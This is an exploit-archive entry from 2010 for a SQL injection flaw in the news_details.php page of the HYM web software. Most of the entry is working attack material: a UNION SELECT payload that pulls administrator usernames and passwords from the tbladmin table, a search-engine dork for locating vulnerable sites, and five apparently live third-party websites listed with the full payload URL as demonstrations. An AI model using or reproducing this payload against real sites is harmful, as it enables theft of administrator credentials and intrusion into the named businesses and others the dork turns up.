HYM (news_details.php) SQL Injection Vulnerability

2010-07-07T00:00:00
ID 1337DAY-ID-13229
Type zdt
Reporter GlaDiaT0R
Modified 2010-07-07T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ==================================================
HYM (news_details.php) SQL Injection Vulnerability
==================================================


##############################################################################
# [+]Title: [HYM (news_details.php) SQL Injection Vulnerability]
##############################################################################
# [+] About :
==============================================================================
# Author :  GlaDiaT0R  
# Contact: the_gl4di4t0r[AT]hotmail[DOT]com or berrahal.ryadh[AT]gmail[DOT]com
# Team :  Tunisian Power Team
# Greetz : ALLAH ! , Boomrang_victim, Marwen_Neo, Alphanix, Zigma & my friends
#
# Software Link: http://www.hym.com.au
# Google dork : [ Powered by HYM ]
##############################################################################
# [+] Exploits :
==============================================================================
#
#       Path: http://localhost/news_details.php?news_id=[SQL]
#             
#       Demo : -1994+union+all+select+1,2,3,group_concat(username,0x3a,passwd),5,6+from+tbladmin--
#    http://www.peachbooksales.com.au/news_details.php?news_id=-1994+union+all+select+1,2,3,group_concat(username,0x3a,passwd),5,6+from+tbladmin--     
#    http://www.jonesbuilder.com.au/news_details.php?news_id=-1994+union+all+select+1,2,3,group_concat(username,0x3a,passwd),5,6+from+tbladmin--
#    http://www.historicalvillage.com.au/news_details.php?news_id=-1994+union+all+select+1,2,3,group_concat(username,0x3a,passwd),5,6+from+tbladmin--
#    http://www.ultimategoddess.com.au/news_details.php?news_id=-1994+union+all+select+1,2,3,group_concat(username,0x3a,passwd),5,6+from+tbladmin--
#    http://www.linklearn.com.au/news_details.php?news_id=-1994+union+all+select+1,2,3,group_concat(username,0x3a,passwd),5,6+from+tbladmin--
##############################################################################
# Notice: I'M MUSLIM
############################################################################## 



#  0day.today [2018-01-09]  #